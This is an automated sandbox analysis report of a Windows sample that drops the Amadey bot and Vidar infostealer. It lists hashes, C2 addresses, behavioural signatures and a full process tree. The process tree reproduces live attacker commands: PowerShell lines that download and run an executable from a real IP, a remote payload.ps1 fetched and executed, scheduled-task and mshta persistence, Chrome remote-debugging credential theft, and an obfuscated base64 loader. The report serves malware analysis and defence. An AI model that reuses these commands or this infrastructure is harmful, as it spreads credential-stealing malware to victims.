Analysis

  • max time kernel
    88s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2025, 04:01

General

  • Target

    f5551fdfa38b97acefcfb04980299dd491c62676af55f14f57ea11e4fe64d699.exe

  • Size

    2.9MB

  • MD5

    bfa1b92e7d23318d2085ab0b4cccbb7a

  • SHA1

    fd1e1b1ee69bd0a5942c8bdd1f5762c0db060ce4

  • SHA256

    f5551fdfa38b97acefcfb04980299dd491c62676af55f14f57ea11e4fe64d699

  • SHA512

    3e8fc482bf521daa60dae447bfbcfa8d43e3365ca2a70d01d95292a6ba5207ee244640fb5b823f7f2934d60f542329116348fc33f4c0d6a2c7d6263f346dca49

  • SSDEEP

    49152:P/2bh/isGdH8w29VI2Q9rsPKu6cp2EL0qso/m:X2QDdcr9VI20o7zwEL0q7u

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 16 IoCs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 8 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 3 IoCs
  • Modifies Control Panel 52 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f5551fdfa38b97acefcfb04980299dd491c62676af55f14f57ea11e4fe64d699.exe
    "C:\Users\Admin\AppData\Local\Temp\f5551fdfa38b97acefcfb04980299dd491c62676af55f14f57ea11e4fe64d699.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Downloads MZ/PE file
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Users\Admin\AppData\Local\Temp\REPTOP0RXXVNRS8MHM8X9BUXRT.exe
      "C:\Users\Admin\AppData\Local\Temp\REPTOP0RXXVNRS8MHM8X9BUXRT.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Downloads MZ/PE file
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2504
        • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
          "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:664
          • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
            "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies system certificate store
            PID:1612
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 500
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2408
        • C:\Users\Admin\AppData\Local\Temp\10042390101\uW8i508.exe
          "C:\Users\Admin\AppData\Local\Temp\10042390101\uW8i508.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1148
        • C:\Users\Admin\AppData\Local\Temp\10043470101\FydOzyQ.exe
          "C:\Users\Admin\AppData\Local\Temp\10043470101\FydOzyQ.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:608
          • C:\Users\Admin\AppData\Local\Temp\10043470101\FydOzyQ.exe
            "C:\Users\Admin\AppData\Local\Temp\10043470101\FydOzyQ.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2420
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 608 -s 500
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2460
        • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
          "C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10046200141\ISPWgd6.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1956
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://0xffsec.net/f7sjdjf2w1/payload/fickle/payload.ps1'))) -ArgumentList 'QQ', '0xffsec.net', 'f7sjdjf2w1'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1856
        • C:\Users\Admin\AppData\Local\Temp\10047700101\016789654f.exe
          "C:\Users\Admin\AppData\Local\Temp\10047700101\016789654f.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:952
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn 9aXTcma0Prp /tr "mshta C:\Users\Admin\AppData\Local\Temp\1JkCROESI.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1640
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn 9aXTcma0Prp /tr "mshta C:\Users\Admin\AppData\Local\Temp\1JkCROESI.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:924
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\1JkCROESI.hta
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:2204
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'M1KCKSQE9BDMYPA52TPMGIGYGVGRCVNT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1556
              • C:\Users\Admin\AppData\Local\TempM1KCKSQE9BDMYPA52TPMGIGYGVGRCVNT.EXE
                "C:\Users\Admin\AppData\Local\TempM1KCKSQE9BDMYPA52TPMGIGYGVGRCVNT.EXE"
                7⤵
                • Executes dropped EXE
                PID:872
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\10047710121\am_no.cmd" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2148
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10047710121\am_no.cmd" any_word
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2828
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 2
              6⤵
              • System Location Discovery: System Language Discovery
              • Delays execution with timeout.exe
              PID:2324
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2980
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2532
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2632
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2536
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:808
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2284
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "9XEbLmafGKm" /tr "mshta \"C:\Temp\1dMNBE7eo.hta\"" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1208
            • C:\Windows\SysWOW64\mshta.exe
              mshta "C:\Temp\1dMNBE7eo.hta"
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies Internet Explorer settings
              PID:852
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1596
                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:1660
        • C:\Users\Admin\AppData\Local\Temp\10048320101\a8793faabc.exe
          "C:\Users\Admin\AppData\Local\Temp\10048320101\a8793faabc.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2448
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10048330141\ISPWgd6.ps1"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:296
        • C:\Users\Admin\AppData\Local\Temp\10048340101\mAtJWNv.exe
          "C:\Users\Admin\AppData\Local\Temp\10048340101\mAtJWNv.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:2384
          • C:\Users\Admin\AppData\Local\Temp\10048340101\mAtJWNv.exe
            "C:\Users\Admin\AppData\Local\Temp\10048340101\mAtJWNv.exe"
            5⤵
            • Executes dropped EXE
            PID:1904
          • C:\Users\Admin\AppData\Local\Temp\10048340101\mAtJWNv.exe
            "C:\Users\Admin\AppData\Local\Temp\10048340101\mAtJWNv.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2760
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              6⤵
              • Uses browser remote debugging
              PID:2740
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6589758,0x7fef6589768,0x7fef6589778
                7⤵
                  PID:2204
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  7⤵
                    PID:1700
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:2
                    7⤵
                      PID:2864
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:8
                      7⤵
                        PID:1108
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:8
                        7⤵
                          PID:2280
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:2948
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2312 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:2732
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:2
                          7⤵
                            PID:1532
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2156 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:1
                            7⤵
                            • Uses browser remote debugging
                            PID:2840
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3472 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:8
                            7⤵
                              PID:2784
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3588 --field-trial-handle=1360,i,11259927842115520181,16820149679469264285,131072 /prefetch:8
                              7⤵
                                PID:684
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\5fctr" & exit
                              6⤵
                                PID:2940
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 11
                                  7⤵
                                  • Delays execution with timeout.exe
                                  PID:2396
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 512
                              5⤵
                              • Program crash
                              PID:1092
                          • C:\Users\Admin\AppData\Local\Temp\10048350101\MCxU5Fj.exe
                            "C:\Users\Admin\AppData\Local\Temp\10048350101\MCxU5Fj.exe"
                            4⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            PID:3024
                            • C:\Windows\system32\cmd.exe
                              cmd.exe /c lom.bat
                              5⤵
                                PID:2420
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic cpu get name
                                  6⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2428
                                • C:\Windows\system32\find.exe
                                  find "QEMU"
                                  6⤵
                                    PID:3068
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@g@D0@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@FM@dQBi@HM@d@By@Gk@bgBn@C